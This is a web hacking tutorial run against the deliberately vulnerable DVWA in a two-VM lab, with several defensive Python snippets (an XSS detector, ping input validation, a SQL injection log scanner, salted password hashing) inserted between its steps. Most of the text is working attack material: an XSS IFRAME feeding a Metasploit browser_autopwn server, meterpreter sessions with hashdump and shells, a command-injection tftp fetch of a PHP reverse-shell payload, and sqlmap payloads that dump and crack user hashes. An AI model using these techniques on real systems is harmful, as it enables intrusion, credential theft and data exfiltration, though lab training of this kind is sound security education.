Hello and welcome. Today I'll be writing a tutorial on the basics of web hacking. To make the learning experience more enjoyable we'll be using "Damn Vulnerable Web Application (DVWA)", which is designed as a web security learning platform. I will only be demonstrating three scenarios which lead to a server compromise: (1) Persistent XSS + IFRAME, (2) Command Execution and (3) MySQL Injection. There are many more test cases which can be examined, but I leave that up to the diligent reader's own discretion. You can download "Damn Vulnerable Web Application (DVWA)" here. Setting up this lab is quite easy, so don't hesitate to try it for yourself…
Ok, let's get to the good stuff. I'll be using two VMs:
Attacker: Backtrack 5 => 192.168.111.129
Victim: Windows XP => 192.168.111.130
Cross Site Scripting isn't always appreciated as a legitimate attack vector, but as we'll see, persistent XSS can have some nasty implications. We'll start off by browsing to the "Sign Guestbook" page. Because user input is not sanitized, we are able to inject client-side markup into the message box. Using an IFRAME we can redirect any user visiting this Guestbook to our malicious server. In the screenshot below you can see our "innocent" message being posted. Take note of the URI path being used, "/innocent".
Code: <iframe src="http://192.168.111.129/innocent" height="0" width="0"></iframe>
Screenshot: Sign Guestbook
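As an added illustration (not code from the post or from DVWA), here is what the guestbook's defect looks like on the rendering side, plus a small check a defender can run over stored messages; the sample post is a constructed copy of the IFRAME above and the function names are mine:

```python
import html
from html.parser import HTMLParser

# Constructed copy of the guestbook post used above (closing tag added).
INNOCENT_POST = '<iframe src="http://192.168.111.129/innocent" height="0" width="0"></iframe>'


class FrameFinder(HTMLParser):
    """Collect tags that can pull third-party content into a stored message."""
    ACTIVE = {"iframe", "frame", "script", "object", "embed"}

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names, so SRC= is found as src
        if tag in self.ACTIVE:
            self.hits.append((tag, dict(attrs).get("src")))


def find_active_content(message):
    """Return (tag, src) pairs for embedded active content in one guestbook entry."""
    finder = FrameFinder()
    finder.feed(message)
    return finder.hits


def render_entry_unsafe(name, message):
    """What the vulnerable guestbook does: raw concatenation, so the iframe is live."""
    return f"<p><b>{name}</b>: {message}</p>"


def render_entry_safe(name, message):
    """Output encoding: the same bytes are stored, but the browser sees inert text."""
    return f"<p><b>{html.escape(name)}</b>: {html.escape(message)}</p>"
```

Run `find_active_content` over the guestbook table to find posts like the one above; the stored text is unchanged by the fix, only its rendering is.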
Ok, so far so good. Now let's set up a client-side exploit server for our unsuspecting victim to connect to. First of all, make sure your Backtrack machine isn't already using port 80 (for example if you're hosting an Apache server). Fire up msfconsole and select the browser_autopwn module, taking care to configure the options properly. Below you can see my sample configuration (be sure to set the correct URIPATH)…

msf auxiliary(browser_autopwn) > show options

Module options (auxiliary/server/browser_autopwn):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   LHOST       192.168.111.129  yes       The IP address to use for reverse-connect payloads
   SRVHOST     192.168.111.129  yes       The local host to listen on.
   SRVPORT     80               yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate
   SSLVersion  SSL3             no        Specify the version of SSL that should be used
   URIPATH     /innocent        no        The URI to use for this exploit (default is random)

msf auxiliary(browser_autopwn) > exploit
[*] Auxiliary module execution completed
[*] Setup
[*] Obfuscating initial javascript 2011-11-09 05:36:52 +0100
[*] Done in 1.041111216 seconds
[*] Starting exploit modules on host 192.168.111.129...
[*] ---
[*] Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.111.129:80/EKlBI
[*] Server started.
[*] Starting exploit multi/browser/java_calendar_deserialize with payload java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.111.129:80/hhbLra
[*] Server started.
[*] Starting exploit multi/browser/java_trusted_chain with payload java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.111.129:80/JaTFlOKmWUq
[...snip...]
[*] --- Done, found 23 exploit modules
[*] Using URL: http://192.168.111.129:80/innocent
[*] Server started.
Perfect, everything is set up. All we have to do now is wait for our unsuspecting victim to view the Guestbook page. As you can see in the screenshot below, when our victim views the page he/she cannot visually see anything malicious about our post (if you like you can even insert a real message before your IFRAME). Even though nothing fishy seems to be going on, our victim is redirected to our exploit server, which leverages browser exploits to get shell access. Game Over!!
Screenshot: Victim

[*] Using URL: http://192.168.111.129:80/innocent
[*] Server started.
[*] 192.168.111.130 Browser Autopwn request '/innocent'
[*] 192.168.111.130 Browser Autopwn request '/innocent?sessid=TWljcm9zb2Z0IFdpbmRvd3M6WFA6U1AwOmVuLXVzOng4NjpNU0lFOjYuMDo%3d'
[*] 192.168.111.130 JavaScript Report: Microsoft Windows:XP:SP0:en-us:x86:MSIE:6.0:
[*] Responding with exploits
[*] Sending MS03-020 Internet Explorer Object Type to 192.168.111.130:1083...
[*] Sending Internet Explorer DHTML Behaviors Use After Free to 192.168.111.130:1084 (target: IE 6 SP0-SP2 (onclick))...
[*] Sending stage (752128 bytes) to 192.168.111.130
[*] Meterpreter session 1 opened (192.168.111.129:3333 -> 192.168.111.130:1085) at 2011-11-09 05:38:35 +0100
[*] Session ID 1 (192.168.111.129:3333 -> 192.168.111.130:1085) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3460)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3684
[+] Successfully migrated to process

msf auxiliary(browser_autopwn) > sessions -l

Active sessions
===============

  Id  Type                   Information                              Connection
  --  ----                   -----------                              ----------
  1   meterpreter x86/win32  FLUXX-J18BEF9YQ\Owner @ FLUXX-J18BEF9YQ  192.168.111.129:3333 -> 192.168.111.130:1085

msf auxiliary(browser_autopwn) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:fc4305db8da15f1e2404624e4bf5045f:bfcea702c343c38e5598448fd52782e8:::
Owner:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:d515e27c8b5a477fe5189a1377c6c7e2:::

meterpreter > ps

Process list
============

 PID   Name              Arch  Session  User                          Path
 ---   ----              ----  -------  ----                          ----
 0     [System Process]
 1000  svchost.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\System32\svchost.exe
 1056  svchost.exe       x86   0        NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\System32\svchost.exe
 1340  explorer.exe      x86   0        FLUXX-J18BEF9YQ\Owner         C:\WINDOWS\Explorer.EXE
 [...snip...]
 636   services.exe      x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\services.exe
 648   lsass.exe         x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\lsass.exe
 808   svchost.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\svchost.exe
 908   svchost.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\svchost.exe

meterpreter > migrate 648
[*] Migrating to 648...
[*] Migration completed successfully.
meterpreter > shell
Process 3952 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . : localdomain
        IP Address. . . . . . . . . . . . : 192.168.111.130
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . :

C:\WINDOWS\system32>...Game Over...
If we browse to the "Command Execution" tab we are presented with a small PHP utility that allows us to ping remote machines. After a bit of fooling around I discovered you can make the utility execute multiple commands by chaining them together with the "&" character. Our end-game ploy in this demo is to remotely execute a PHP exploit. So first of all we have to find a way to transfer our malicious payload to the remote machine. There are many ways to do this: ftp, tftp, inline transfer, web browser,… To get an idea of what we have to work with we can get a directory listing of C:\WINDOWS\system32, which contains the binaries of the programs installed on the remote server. As we can see below we are in luck: tftp is installed on the remote machine (this is the most practical transfer method for non-interactive command-line execution).
Code: & cd ../../../../../../../../WINDOWS/system32 & dir
Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
            [-r count] [-s count] [[-j host-list] | [-k host-list]]
            [-w timeout] target_name

Options:
    -t             Ping the specified host until stopped.
                   To see statistics and continue - type Control-Break;
                   To stop - type Control-C.
    -a             Resolve addresses to hostnames.
    -n count       Number of echo requests to send.
    -l size        Send buffer size.
    -f             Set Don't Fragment flag in packet.
    -i TTL         Time To Live.
    -v TOS         Type Of Service.
    -r count       Record route for count hops.
    -s count       Timestamp for count hops.
    -j host-list   Loose source route along host-list.
    -k host-list   Strict source route along host-list.
    -w timeout     Timeout in milliseconds to wait for each reply.

 Volume in drive C has no label.
 Volume Serial Number is 7833-0FA5

 Directory of C:\WINDOWS\system32

[...snip...]
08/29/2002  08:00 PM            71,168 telnet.exe
08/29/2002  08:00 PM           343,552 termmgr.dll
08/29/2002  08:00 PM           200,192 termsrv.dll
08/29/2002  08:00 PM            16,896 tftp.exe
08/29/2002  08:00 PM           384,000 themeui.dll
08/29/2002  08:00 PM            90,112 timedate.cpl
08/29/2002  08:00 PM             4,048 timer.drv
[...snip...]
08/29/2002  08:00 PM             9,728 xolehlp.dll
08/29/2002  08:00 PM           187,904 xpsp1res.dll
08/29/2002  08:00 PM           316,416 zipfldr.dll
            1635 File(s)    254,218,638 bytes
              39 Dir(s)   2,506,862,592 bytes free
Let’s go back to our Backtrack machine to create our PHP payload and set up a tftp server to host it.
root@bt:~# atftpd --daemon --port 69 /tmp/
root@bt:~# netstat -anup
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
udp        0      0 192.168.111.129:53569   192.168.111.1:53        ESTABLISHED 1496/firefox-bin
udp        0      0 0.0.0.0:68              0.0.0.0:*                           1797/dhclient
udp        0      0 0.0.0.0:68              0.0.0.0:*                           1075/dhclient3
udp        0      0 0.0.0.0:69              0.0.0.0:*                           2004/atftpd
root@bt:~# msfpayload php/meterpreter/reverse_tcp LHOST=192.168.111.129 LPORT=9988 O

       Name: PHP Meterpreter, PHP Reverse TCP stager
     Module: payload/php/meterpreter/reverse_tcp
    Version: 12196, 12196
   Platform: PHP
       Arch: php
Needs Admin: No
 Total size: 1286
       Rank: Normal

Provided by:
  egypt <egypt@metasploit.com>

Basic options:
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST  192.168.111.129  yes       The listen address
LPORT  9988             yes       The listen port

Description:
  Reverse PHP connect back stager with checks for disabled functions,
  Run a meterpreter server in PHP

root@bt:~# msfpayload php/meterpreter/reverse_tcp LHOST=192.168.111.129 LPORT=9988 R > /tmp/evil.php
root@bt:~# ls -l /tmp/
total 28
drwx------ 2 root root 4096 2011-11-09 04:17 kde-root
drwx------ 2 root root 4096 2011-11-09 04:17 ksocket-root
drwx------ 2 root root 4096 2011-11-09 04:17 orbit-root
drwx------ 2 root root 4096 2011-11-09 04:17 pulse-3uavuaOb9vyJ
-rw------- 1 root root  141 2011-11-09 04:17 serverauth.pWwJb7S99J
drwx------ 2 root root 4096 2011-11-09 04:17 ssh-ZXZzWw1229
-rw-r--r-- 1 root root 1286 2011-11-09 04:44 evil.php
Ok, we're all set; let's return to our "Command Execution" tab. We are going to make the remote machine use tftp to download our payload and place it in the web root. Take note that XAMPP's web root is located in C:\xampp\htdocs. As we can see in the screenshot below, our payload has successfully been downloaded. Once this has been accomplished we can use the attacker's browser to open http://192.168.111.130/evil.php, which will then automatically execute our payload. Game Over!!
Code: & cd c:\xampp\htdocs & tftp -i 192.168.111.129 GET evil.php
Screenshot: php transfer

msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.111.129  yes       The listen address
   LPORT  9988             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.111.129:9988
[*] Starting the payload handler...
[*] Sending stage (38553 bytes) to 192.168.111.130
[*] Meterpreter session 1 opened (192.168.111.129:9988 -> 192.168.111.130:1053) at 2011-11-09 05:16:13 +0100

meterpreter > shell
Process 3156 created.
Channel 0 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\xampp\apache>...Game Over...
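An added example, not the post's or DVWA's own code, of how the ping utility should handle its target so that the "&" chaining above never reaches a shell: the value must parse as an IP address and ping is invoked with an argv list. The two chained inputs are constructed copies of the commands used above; `run_ping` and the other function names are mine.

```python
import ipaddress
import re
import subprocess
import sys

# Constructed inputs: one legitimate target and copies of the two chained commands above.
GOOD_TARGET = "192.168.111.129"
BAD_TARGETS = [
    "192.168.111.129 & cd ../../../../../../../../WINDOWS/system32 & dir",
    "192.168.111.129 & cd c:\\xampp\\htdocs & tftp -i 192.168.111.129 GET evil.php",
]

# Characters that let a value break out of one command into another.
SHELL_META = re.compile(r"[&|;`$<>\r\n]")


def looks_injected(target):
    """Detection side: flag a submitted target that carries shell metacharacters."""
    return SHELL_META.search(target) is not None


def build_ping_argv(target):
    """Validate the target as a literal IP address and build ping's argv.

    Two layers: ipaddress rejects anything that is not an address (spaces,
    '&', paths), and the result is an argv list, never a string for a shell.
    """
    addr = ipaddress.ip_address(target.strip())  # ValueError on anything else
    count_flag = "-n" if sys.platform.startswith("win") else "-c"
    return ["ping", count_flag, "3", str(addr)]


def accepts_target(target):
    """True if the validator lets the value through, False if it was rejected."""
    try:
        build_ping_argv(target)
        return True
    except ValueError:
        return False


def run_ping(target):
    """Hypothetical wrapper: run ping without a shell and return the CompletedProcess."""
    return subprocess.run(build_ping_argv(target), capture_output=True, text=True, timeout=30)
```

If hostnames must be accepted as well, validate them against a strict hostname pattern before they reach the argv list; the no-shell invocation stays the same.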
To wrap up the tutorial let's have a look at MySQL injection. To follow this tutorial in Backtrack you'll have to install a Firefox plug-in called Tamper Data; it allows you to intercept and modify HTTP/HTTPS headers and POST parameters (big up to anyone who has modified some poorly configured online poll hehe). Browse to the "SQL Injection" tab, start Tamper Data, enter a number in the field (1 to 5) and press enter. Tamper Data will alert you that it has intercepted a request; allow it to continue and then examine the contents of the data. You should see something like the screenshot below.
Screenshot: Tamper Data
Copy the entire content of the "Cookie" field. We will be using this data as a parameter for sqlmap. Achieving injection is pretty easy; observe the syntax below…

root@bt:/pentest/database/sqlmap# ./sqlmap.py --url='http://192.168.111.130/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='PHPSESSID=scmkpnhd6a9smq30rvjkse6ts0; security=low'
[...snip...]
sqlmap identified the following injection points with a total of 136 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1' AND (SELECT 3474 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,112,117,58),(SELECT (CASE WHEN (3474=3474) THEN 1 ELSE 0 END)),CHAR(58,113,101,109,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'iXZd'='iXZd&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=1' UNION ALL SELECT CONCAT(CHAR(58,106,112,117,58),IFNULL(CAST(CHAR(75,115,118,88,119,75,101,111,85,115) AS CHAR),CHAR(32)),CHAR(58,113,101,109,58)), NULL# AND 'fpda'='fpda&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'ZrXF'='ZrXF&Submit=Submit
---

[06:16:54] [INFO] manual usage of GET payloads requires url encoding
[06:16:54] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.21, PHP 5.3.8
back-end DBMS: MySQL 5.0
[06:16:54] [INFO] Fetched data logged to text files under /pentest/database/sqlmap/output/192.168.111.130

[*] shutting down at: 06:16:54
So injection is successful; you can see that we used the data recovered from Tamper Data (note that without this cookie data, injection cannot be achieved). If we add the --dbs flag to the command above we will get a list of the available databases, as shown below.

[...snip...]
[06:19:36] [INFO] fetching database names
available databases [8]:
[*] cdcol
[*] dvwa
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
[*] webauth
[...snip...]
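As an added detection example (not part of the original post), here is a scan over constructed Apache access-log lines that carry the same three payload classes sqlmap reported above, url-encoded as they would appear on the wire; the log lines, the signature names and the function names are my own.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-log lines modelled on the sqlmap run above;
# the id= values are the three payload classes, url-encoded as sent on the wire.
SAMPLE_LOG = """\
192.168.111.129 - - [09/Nov/2011:06:16:40 +0100] "GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 1543 "-" "Mozilla/5.0"
192.168.111.129 - - [09/Nov/2011:06:16:51 +0100] "GET /vulnerabilities/sqli/?id=1%27%20AND%20SLEEP%285%29%20AND%20%27ZrXF%27%3D%27ZrXF&Submit=Submit HTTP/1.1" 200 1543 "-" "sqlmap/1.0-dev"
192.168.111.129 - - [09/Nov/2011:06:16:52 +0100] "GET /vulnerabilities/sqli/?id=1%27%20UNION%20ALL%20SELECT%20CONCAT%28CHAR%2858%2C106%29%2CNULL%29%23&Submit=Submit HTTP/1.1" 200 1801 "-" "sqlmap/1.0-dev"
192.168.111.129 - - [09/Nov/2011:06:16:53 +0100] "GET /vulnerabilities/sqli/?id=1%27%20AND%20%28SELECT%203474%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20AND%20%27iXZd%27%3D%27iXZd&Submit=Submit HTTP/1.1" 500 612 "-" "sqlmap/1.0-dev"
192.168.111.130 - - [09/Nov/2011:06:20:01 +0100] "GET /vulnerabilities/sqli/?id=3&Submit=Submit HTTP/1.1" 200 1543 "-" "Mozilla/5.0"
"""

# Source address and request target out of one combined-log line.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')

# One signature per payload class in the sqlmap output above (names are mine).
SIGNATURES = {
    "union": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    "time_based": re.compile(r"\bSLEEP\s*\(", re.I),
    "error_based": re.compile(r"\bINFORMATION_SCHEMA\b|\bFLOOR\s*\(\s*RAND\s*\(", re.I),
    "string_tautology": re.compile(r"\bAND\s+'(\w+)'\s*=\s*'\1\b", re.I),
}


def classify_param(value):
    """Names of the signatures a decoded parameter value matches (empty if clean)."""
    return [name for name, rx in SIGNATURES.items() if rx.search(value)]


def scan_access_log(text, param="id"):
    """Return (source_ip, decoded_value, matched_signatures) for each suspicious request.

    parse_qs percent-decodes the value, so the match runs on what the
    application's SQL layer would actually have received.
    """
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        src, target = m.groups()
        for value in parse_qs(urlsplit(target).query).get(param, []):
            tags = classify_param(value)
            if tags:
                hits.append((src, value, tags))
    return hits


def sources_by_hits(hits):
    """Count suspicious requests per source address (sqlmap needed 136 above)."""
    counts = {}
    for src, _, _ in hits:
        counts[src] = counts.get(src, 0) + 1
    return counts
```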
After some enumeration, I discovered that the database "dvwa" contained a table named "users". Dumping this table reveals a list of users and their hashed passwords. I then proceeded to run a dictionary-based attack on these hashes, and in less than 30 seconds they were all cracked. Game Over!!

root@bt:/pentest/database/sqlmap# ./sqlmap.py --url='http://192.168.111.130/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='PHPSESSID=scmkpnhd6a9smq30rvjkse6ts0; security=low' -D dvwa -T users --dump
[...snip...]
+---------------------------------+------------+-----------+----------------------------------+---------+
| avatar                          | first_name | last_name | password                         | user    |
+---------------------------------+------------+-----------+----------------------------------+---------+
| dvwa/hackable/users/admin.jpg   | admin      | admin     | 5f4dcc3b5aa765d61d8327deb882cf99 | admin   |
| dvwa/hackable/users/smithy.jpg  | Bob        | Smith     | 5f4dcc3b5aa765d61d8327deb882cf99 | smithy  |
| dvwa/hackable/users/pablo.jpg   | Pablo      | Picasso   | 0d107d09f5bbe40cade3de5c71e9e9b7 | pablo   |
| dvwa/hackable/users/1337.jpg    | Hack       | Me        | 8d3533d75ae2c3966d7e0d4fcc69216b | 1337    |
| dvwa/hackable/users/gordonb.jpg | Gordon     | Brown     | e99a18c428cb38d5f260853678922e03 | gordonb |
+---------------------------------+------------+-----------+----------------------------------+---------+

+---------+      +------------+
| user    |      | passwords  |
+---------+      +------------+
| admin   | ===> | password   |
| smithy  | ===> | password   |
| pablo   | ===> | letmein    |
| 1337    | ===> | charley    |
| gordonb | ===> | abc123     |
+---------+      +------------+
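An added example, not from the post, of the check a defender would run on such a dump and of the fix: confirming that the stored values are unsalted MD5 (the identical hash for admin and smithy already gives that away) and replacing them with a salted, iterated PBKDF2. The user/hash pairs are copied from the dump above; the wordlist and the function names are mine.

```python
import hashlib
import hmac
import os

# User/hash pairs copied from the dump above; the candidate wordlist is constructed.
DUMPED = {
    "admin": "5f4dcc3b5aa765d61d8327deb882cf99",
    "smithy": "5f4dcc3b5aa765d61d8327deb882cf99",
    "pablo": "0d107d09f5bbe40cade3de5c71e9e9b7",
    "1337": "8d3533d75ae2c3966d7e0d4fcc69216b",
    "gordonb": "e99a18c428cb38d5f260853678922e03",
}
WORDLIST = ["123456", "password", "letmein", "qwerty", "abc123", "charley"]


def md5_hex(word):
    return hashlib.md5(word.encode()).hexdigest()


def audit_unsalted(dumped, wordlist):
    """Confirm the storage scheme: plain MD5 with no salt.

    With no salt, one hash per candidate word covers every user at once, and
    two users with the same password show the same stored value. Returns
    {user: recovered_word_or_None}; any recovered entry is the finding.
    """
    table = {md5_hex(w): w for w in wordlist}
    return {user: table.get(h) for user, h in dumped.items()}


def hash_password(password, salt=None, iterations=200_000):
    """Replacement scheme: per-user random salt and an iterated KDF (PBKDF2-HMAC-SHA256)."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; constant-time compare."""
    _, iterations, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)
```

With the replacement scheme the same password for admin and smithy would produce two different stored values, and each candidate must be recomputed per user with 200,000 iterations rather than one MD5 for all of them.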